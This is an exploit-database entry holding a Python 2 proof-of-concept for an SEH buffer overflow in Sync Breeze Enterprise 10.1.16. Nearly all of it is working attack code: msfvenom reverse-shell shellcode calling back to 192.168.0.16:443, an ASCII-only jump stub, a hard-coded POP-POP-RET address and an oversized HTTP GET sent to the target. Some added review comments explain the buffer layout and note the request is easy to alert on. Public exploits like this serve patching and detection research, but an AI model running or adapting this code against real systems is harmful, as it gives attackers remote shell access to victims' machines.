Sync Breeze Enterprise 10.1.16 SEH Overflow

🗓️ 12 Oct 2017 00:00:00 · Reported by wetw0rk · Type: packetstorm

Sync Breeze Enterprise v10.1.16 SEH Overflow

Code
`#!/usr/bin/env python  
#
# Exploit Title : Sync Breeze Enterprise v10.1.16 0day
# Date : 10/11/2017
# Vendor HomePage : http://www.syncbreeze.com
# Exploit Author : Milton Valencia (wetw0rk)
# Software : http://www.syncbreeze.com/downloads.html
# Version : 10.1.16
# Tested on : Windows 7 (x86)
#
# Description : Sync Breeze Enterprise 10.1.16 suffers from a SEH based
# vulnerability. Successful exploitation results in remote
# access.
#
# Special Greetz : Corelan, Offsec, Abatchy (top llama), Seamus, N4ss4r
# Ryan, Miguel (best boss..), everyone at https://netsecfocus.slack.com/
#
# NOTE(review): Python 2 only -- `print` statements and plain `str` buffers
# handed to socket.send(); it does not run unmodified under Python 3.
#
# What the script below does, as written: it assembles one oversized HTTP
# request path (encoded payload + "A" padding + SEH record + jump stub + "D"
# filler) and sends a single "GET /<buffer> HTTP/1.1" with no Host header and
# no body to <target>:<port>. The path is 9067 bytes plus the payload length
# and consists almost entirely of repeated "A"/"D" bytes -- a request shape
# that is straightforward to alert on at the web or proxy layer.

import sys, socket, struct

# Target host/port from the command line. Only a missing argument is handled;
# a non-numeric port raises an uncaught ValueError at int().
try:
    host = sys.argv[1]
    port = int(sys.argv[2])

except IndexError:

    print "Usage: %s <target> <port>" % sys.argv[0]
    print "Example: %s 192.168.0.16 80" % sys.argv[0]
    sys.exit(0)

print "[->] Attacking %s:%d get that handler up" % (host,port)

# Encoded payload produced by the msfvenom command quoted below (per the
# original comment). The x86/alpha_upper encoding is what keeps the bytes
# listed after -b (\x00\x0a\x0d) out of the request path; the listener
# address is fixed inside these bytes and the script never reads it back.
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.16 LPORT=443
# -e x86/alpha_upper -b "\x00\x0a\x0d" -f c
shellcode = (
    "\x89\xe3\xda\xdf\xd9\x73\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
    "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
    "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
    "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
    "\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4c\x42\x33\x30"
    "\x35\x50\x53\x30\x33\x50\x4b\x39\x4a\x45\x46\x51\x39\x50\x35"
    "\x34\x4c\x4b\x30\x50\x46\x50\x4c\x4b\x46\x32\x44\x4c\x4c\x4b"
    "\x36\x32\x42\x34\x4c\x4b\x53\x42\x46\x48\x54\x4f\x4e\x57\x30"
    "\x4a\x56\x46\x56\x51\x4b\x4f\x4e\x4c\x37\x4c\x55\x31\x43\x4c"
    "\x34\x42\x36\x4c\x47\x50\x59\x51\x58\x4f\x44\x4d\x43\x31\x38"
    "\x47\x4d\x32\x5a\x52\x50\x52\x46\x37\x4c\x4b\x30\x52\x42\x30"
    "\x4c\x4b\x31\x5a\x37\x4c\x4c\x4b\x50\x4c\x54\x51\x54\x38\x4b"
    "\x53\x30\x48\x55\x51\x38\x51\x50\x51\x4c\x4b\x51\x49\x37\x50"
    "\x35\x51\x59\x43\x4c\x4b\x50\x49\x54\x58\x4b\x53\x57\x4a\x30"
    "\x49\x4c\x4b\x46\x54\x4c\x4b\x53\x31\x59\x46\x50\x31\x4b\x4f"
    "\x4e\x4c\x59\x51\x48\x4f\x34\x4d\x45\x51\x38\x47\x57\x48\x4b"
    "\x50\x53\x45\x5a\x56\x43\x33\x53\x4d\x4c\x38\x47\x4b\x43\x4d"
    "\x46\x44\x53\x45\x4a\x44\x36\x38\x4c\x4b\x31\x48\x46\x44\x35"
    "\x51\x4e\x33\x52\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x50\x58"
    "\x45\x4c\x33\x31\x48\x53\x4c\x4b\x44\x44\x4c\x4b\x43\x31\x58"
    "\x50\x4c\x49\x50\x44\x36\x44\x36\x44\x51\x4b\x51\x4b\x35\x31"
    "\x31\x49\x31\x4a\x36\x31\x4b\x4f\x4d\x30\x31\x4f\x51\x4f\x31"
    "\x4a\x4c\x4b\x55\x42\x5a\x4b\x4c\x4d\x31\x4d\x32\x48\x46\x53"
    "\x50\x32\x53\x30\x35\x50\x33\x58\x34\x37\x34\x33\x30\x32\x31"
    "\x4f\x56\x34\x53\x58\x50\x4c\x33\x47\x46\x46\x45\x57\x4b\x4f"
    "\x39\x45\x38\x38\x5a\x30\x35\x51\x45\x50\x35\x50\x36\x49\x49"
    "\x54\x46\x34\x46\x30\x35\x38\x37\x59\x4d\x50\x42\x4b\x33\x30"
    "\x4b\x4f\x59\x45\x56\x30\x56\x30\x30\x50\x36\x30\x47\x30\x36"
    "\x30\x57\x30\x46\x30\x42\x48\x5a\x4a\x44\x4f\x39\x4f\x4d\x30"
    "\x4b\x4f\x4e\x35\x5a\x37\x43\x5a\x44\x45\x32\x48\x39\x50\x4f"
    "\x58\x45\x50\x42\x30\x32\x48\x43\x32\x43\x30\x45\x51\x4f\x4b"
    "\x4d\x59\x4a\x46\x43\x5a\x32\x30\x31\x46\x51\x47\x43\x58\x4d"
    "\x49\x4e\x45\x54\x34\x33\x51\x4b\x4f\x48\x55\x4d\x55\x49\x50"
    "\x54\x34\x34\x4c\x4b\x4f\x50\x4e\x55\x58\x43\x45\x4a\x4c\x33"
    "\x58\x4c\x30\x38\x35\x4e\x42\x31\x46\x4b\x4f\x49\x45\x43\x58"
    "\x55\x33\x52\x4d\x33\x54\x35\x50\x4d\x59\x5a\x43\x46\x37\x30"
    "\x57\x51\x47\x50\x31\x5a\x56\x32\x4a\x52\x32\x51\x49\x36\x36"
    "\x4d\x32\x4b\x4d\x52\x46\x4f\x37\x51\x54\x31\x34\x37\x4c\x33"
    "\x31\x55\x51\x4c\x4d\x50\x44\x31\x34\x42\x30\x58\x46\x33\x30"
    "\x47\x34\x31\x44\x46\x30\x31\x46\x56\x36\x46\x36\x51\x56\x46"
    "\x36\x50\x4e\x50\x56\x56\x36\x31\x43\x30\x56\x53\x58\x32\x59"
    "\x58\x4c\x47\x4f\x4b\x36\x4b\x4f\x4e\x35\x4c\x49\x4b\x50\x30"
    "\x4e\x46\x36\x50\x46\x4b\x4f\x36\x50\x42\x48\x53\x38\x4b\x37"
    "\x35\x4d\x45\x30\x4b\x4f\x59\x45\x4f\x4b\x4c\x30\x38\x35\x4f"
    "\x52\x56\x36\x33\x58\x4f\x56\x4a\x35\x4f\x4d\x4d\x4d\x4b\x4f"
    "\x48\x55\x57\x4c\x34\x46\x33\x4c\x34\x4a\x4d\x50\x4b\x4b\x4d"
    "\x30\x44\x35\x33\x35\x4f\x4b\x51\x57\x34\x53\x42\x52\x42\x4f"
    "\x53\x5a\x35\x50\x46\x33\x4b\x4f\x48\x55\x41\x41"
)

# Jump stub, generated with objdump2shellcode (original comment). Per the
# per-instruction annotations it only uses and/sub/push -- all printable
# ASCII opcodes -- to compute a value in eax, pushes it twice, and ends with
# the only non-printable bytes, jmp esp.
# objdump2shellcode -d shellcode -f python -c -v jumpcode
jumpcode = ""
jumpcode += "\x25\x4a\x4d\x4e\x55" # and eax,0x554e4d4a
jumpcode += "\x25\x35\x32\x31\x2a" # and eax,0x2a313235
jumpcode += "\x2d\x37\x37\x37\x37" # sub eax,0x37373737
jumpcode += "\x2d\x74\x74\x74\x74" # sub eax,0x74747474
jumpcode += "\x2d\x55\x54\x55\x70" # sub eax,0x70555455
jumpcode += "\x50" # push eax
jumpcode += "\x25\x4a\x4d\x4e\x55" # and eax,0x554e4d4a
jumpcode += "\x25\x35\x32\x31\x2a" # and eax,0x2a313235
jumpcode += "\x2d\x2d\x76\x7a\x63" # sub eax,0x637a762d
jumpcode += "\x2d\x2d\x76\x7a\x30" # sub eax,0x307a762d
jumpcode += "\x2d\x25\x50\x7a\x30" # sub eax,0x307a5025
jumpcode += "\x50" # push eax
jumpcode += "\xff\xe4" # jmp esp

# Request-path layout (lengths in bytes), derived from the arithmetic below:
#   shellcode + offset           = 2495   -> nSEH sits at fixed path offset 2495
#   nSEH                         = 4      -> two short conditional jumps forward,
#                                            over SEH and into jumpcode (per comment)
#   SEH                          = 4      -> hard-coded handler address in libspp.dll;
#                                            a fixed address only works if that module
#                                            loads at the same base every time -- TODO confirm
#   offset + nSEH + SEH + jumpcode + trigger = 9067
# so the full path is 9067 + len(shellcode) bytes. If len(shellcode) ever
# exceeded 2495 the multiplication would yield an empty offset and the layout
# would silently break; nothing here checks that.
offset = "A" * (2495-len(shellcode)) # offset to nSEH
nSEH = "\x74\x06\x75\x06" # JE/JNZ -> jumpcode
SEH = struct.pack('<L', 0x1001C65C) # POP,POP,RET (libspp.dll)
trigger = "D" * (9067 - len(
jumpcode +
offset +
nSEH +
SEH
)
)

# Order matters: nSEH/SEH must land at exactly 2495/2499, jumpcode right after.
buffer = shellcode + offset + nSEH + SEH + jumpcode + trigger

# One raw HTTP/1.1 GET: no Host header, no body, path is the buffer above.
# The response is never read and the socket is never closed.
# NOTE(review): socket.send() may transmit only part of a ~10 KB buffer;
# sendall() (or checking the return value) is the correct call, and the socket
# should be closed in a finally block or via contextlib.closing.
vulnREQ = "GET /%s HTTP/1.1\r\n\r\n" % (buffer)
print "[->] sending poisonous bamboo"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
sock.send(vulnREQ)
`
